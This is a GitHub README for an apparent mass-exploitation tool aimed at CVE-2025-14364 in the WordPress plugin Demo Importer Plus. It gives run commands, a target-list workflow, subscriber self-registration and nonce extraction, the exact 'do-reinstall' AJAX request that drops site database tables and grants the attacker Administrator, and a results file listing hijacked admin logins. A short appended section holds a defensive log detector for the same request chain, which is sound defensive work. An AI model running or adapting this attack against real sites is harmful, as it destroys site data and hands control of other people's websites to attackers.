Nxploited/CVE-2025-14364

GitHub: Nxploited/CVE-2025-14364

Exploit tool for CVE-2025-14364 in Demo Importer Plus ≤ 2.0.8, demonstrating the full attack path from registration to full site reset to reproduce the privilege escalation.

Stars: 0 | Forks: 0

# CVE-2025-14364 Demo Importer Plus <= 2.0.8 - Missing Authorization for Authenticated (Subscriber+) Site Reset and Privilege Escalation

# CVE-2025-14364 · Demo Importer Plus · Full Site Reset → Privilege Escalation

![CVE](https://img.shields.io/badge/CVE-2025--14364-red?style=flat-square) ![CVSS](https://img.shields.io/badge/CVSS-8.8%20HIGH-orange?style=flat-square) ![Plugin](https://img.shields.io/badge/Plugin-Demo%20Importer%20Plus%20%E2%89%A4%202.0.8-blueviolet?style=flat-square) ![Auth](https://img.shields.io/badge/Auth-Subscriber%2B-yellow?style=flat-square) ![Python](https://img.shields.io/badge/Python-3.10%2B-blue?style=flat-square&logo=python) ![Platform](https://img.shields.io/badge/WordPress-21759B?style=flat-square&logo=wordpress) ![Author](https://img.shields.io/badge/By-Nxploited-brightgreen?style=flat-square)

## 〔 1 〕 Vulnerability

| | |
|---|---|
| **CVE** | CVE-2025-14364 |
| **CVSS v3.1** | **8.8 HIGH** · `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H` |
| **CNA** | Wordfence |
| **Plugin** | Demo Importer Plus |
| **Affected versions** | all versions ≤ **2.0.8** |
| **Required privilege** | Subscriber (lowest registered role) |
| **Type** | Missing capability check → full site reset → privilege escalation |
| **CWE** | CWE-862 · Missing Authorization |

**Root cause:** `Ajax::handle_request()` registers the `demo_importer_plus` AJAX action but never calls `current_user_can()`. Any authenticated Subscriber can send `{"demo_action":"do-reinstall"}` to trigger `wp_install()`, which drops every database table except `users` / `usermeta` and re-runs the WordPress installation routine; during that routine the attacking account is automatically granted the **Administrator** role.

## 〔 2 〕 Attack flow

```
Mode 1 — Diagnose
  Probe: DNS · /wp-login.php · /wp-admin/admin-ajax.php · REST /wp/v2/users
  → Identify live WordPress targets

Mode 2 — Register
  POST /wp-login.php?action=register
  → Create subscriber account
  → Activation email sent to inbox
    ↳ You MUST click the email link before running Mode 3

Mode 3 — Exploit
  POST /wp-login.php                  → Authenticate as subscriber
  GET  /wp-admin/                     → Extract wp-rest-nonce
  POST /wp-admin/admin-ajax.php
       action=demo_importer_plus
       {"demo_action":"do-reinstall"}
  → Trigger full site reset
  ← Response: "Site has been reset successfully"
  → Attacking account now holds Administrator role
```

## 〔 3 〕 Setup

```
git clone https://github.com/Nxploited/CVE-2025-14364.git
cd CVE-2025-14364
pip install -r requirements.txt
python3 CVE-2025-14364.py
```

**`requirements.txt`**

```
aiohttp>=3.9.0
colorama>=0.4.6
urllib3>=1.26.0
```

## 〔 4 〕 Usage

```
Mode [1/2/3]:   1 = Diagnose   2 = Register   3 = Exploit
Targets file:   list.txt (one host per line)
Concurrency:    default 30, max 200
Timeout:        default 10s
```

**Target file format · `list.txt`:**

```
https://target1.com
target2.com
http://target3.com
```

### ► Mode 1 · Diagnose

Probes the four endpoints on every host and reports the clean results.

```
Mode: 1
```

Output → `diagnostics_results.txt` · `passed_targets.txt`

### ► Mode 2 · Register

```
Mode: 2
Email: attacker@example.com
Username: Nxploited
Password: NxploitedSA
```

Output → `register_results.txt`

### ► Mode 3 · Exploit

```
Mode: 3
Username: Nxploited
Password: NxploitedSA
```

On success the tool prints:

```
[HH:MM:SS] SUCCESS "success":true,"message":"Site has been reset successfully" -> https://target.com
```

and writes to `exploit_results.txt`:

```
https://target.com/wp-login.php site:... user:Nxploited pass:NxploitedSA type:admin
```

## 〔 5 〕 Output files

| File | Contents |
|---|---|
| `diagnostics_results.txt` | Full probe JSON for each target |
| `passed_targets.txt` | Clean targets (no errors detected) |
| `register_results.txt` | Log of registration attempts |
| `exploit_results.txt` | Login · nonce · reset result · confirmed administrator hits |
| `reset_results.txt` | Raw `do-reinstall` response for each target |

## 〔 6 〕 Technical details

**Vulnerable request:**

```
POST /wp-admin/admin-ajax.php?action=demo_importer_plus HTTP/1.1
Content-Type: application/json
X-WP-Nonce: <nonce>

{"demo_action":"do-reinstall"}
```

**Successful response:**

```
{"success": true, "data": {"message": "Site has been reset successfully"}}
```

**Nonce extraction · two alternative sources:**

```
wpApiSettings.nonce                    (from /wp-admin/ page source)
elementorOneSettingsData.wpRestNonce   (fallback)
```

## 〔 7 〕 Author and contact

```
By       : Nxploited (Khaled Alenazi)
GitHub   : https://github.com/Nxploited
Telegram : @KNxploited
```

[![GitHub](https://img.shields.io/badge/GitHub-Nxploited-181717?style=for-the-badge&logo=github)](https://github.com/Nxploited) [![Telegram](https://img.shields.io/badge/Telegram-@KNxploited-2CA5E0?style=for-the-badge&logo=telegram)](https://t.me/KNxploited)

## 〔 8 〕 Disclaimer

```
THIS SOFTWARE IS RELEASED STRICTLY FOR SECURITY RESEARCH AND EDUCATION.

The author bears zero responsibility for any actions taken with this tool
against systems the operator does not own or have explicit written
authorization to test. Unauthorized use against third-party systems violates
computer crime laws in most jurisdictions (CFAA, CMA, and equivalents
worldwide) and may result in criminal prosecution. You alone are responsible
for ensuring you have lawful permission before running this tool against any
target.
```
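Added example, not part of this repository: a small Python detector a site owner can run over web server access logs to surface the request chain from section 2 (self-registration, login, then a POST to the `demo_importer_plus` AJAX action from section 6). It assumes Apache/nginx combined log format; the sample log lines are constructed, not a real capture.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs
# Combined log format: client IP, timestamp, "METHOD target HTTP/x", status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
# The AJAX action named in the advisory; every POST to it deserves review
# because the vulnerable handler performs no capability check at all.
SUSPECT_ACTION = "demo_importer_plus"

def parse_line(line):
    """Return a dict for one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, target, status = m.groups()
    url = urlsplit(target)
    return {"ip": ip, "ts": ts, "method": method, "path": url.path,
            "query": parse_qs(url.query), "status": int(status)}

def detect_reset_chain(lines):
    """One finding per POST to the reset action; severity is high when the
    same client self-registered earlier in the log (the advisory's chain)."""
    stages = defaultdict(set)   # ip -> subset of {"register", "login"}
    findings = []
    for line in lines:
        ev = parse_line(line)
        if ev is None or ev["method"] != "POST":
            continue
        q, ip = ev["query"], ev["ip"]
        if ev["path"].endswith("/wp-login.php"):
            stages[ip].add("register" if q.get("action") == ["register"] else "login")
        elif ev["path"].endswith("/admin-ajax.php") and q.get("action") == [SUSPECT_ACTION]:
            findings.append({"ip": ip, "ts": ev["ts"], "status": ev["status"],
                             "registered_first": "register" in stages[ip],
                             "logged_in_first": "login" in stages[ip],
                             "severity": "high" if "register" in stages[ip] else "medium"})
    return findings

# Constructed sample lines (not a real capture) mirroring the three tool modes.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jan/2025:10:00:01 +0000] "POST /wp-login.php?action=register HTTP/1.1" 200 1203
203.0.113.7 - - [10/Jan/2025:10:05:12 +0000] "POST /wp-login.php HTTP/1.1" 302 0
203.0.113.7 - - [10/Jan/2025:10:05:13 +0000] "GET /wp-admin/ HTTP/1.1" 200 48211
203.0.113.7 - - [10/Jan/2025:10:05:14 +0000] "POST /wp-admin/admin-ajax.php?action=demo_importer_plus HTTP/1.1" 200 77
198.51.100.9 - - [10/Jan/2025:10:06:00 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 55
""".splitlines()
```

A standalone medium finding can be a legitimate administrator running a demo import, so correlate it with the WordPress user roles before acting; a high finding from a freshly registered account is the pattern this advisory describes.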
© 2025 Nxploited · Security research only · Demo Importer Plus ≤ 2.0.8 · Fixed in 2.0.9
Tags: CVE-2025-14364, Demo Importer Plus, Subscriber+, WordPress, WordPress plugin, full site reset, protocol analysis, anti-forensics, security assessment, plugin security, database deletion, unauthorized access, privilege escalation, privilege bypass, vulnerability, site reset, administrator assignment, reverse-engineering tool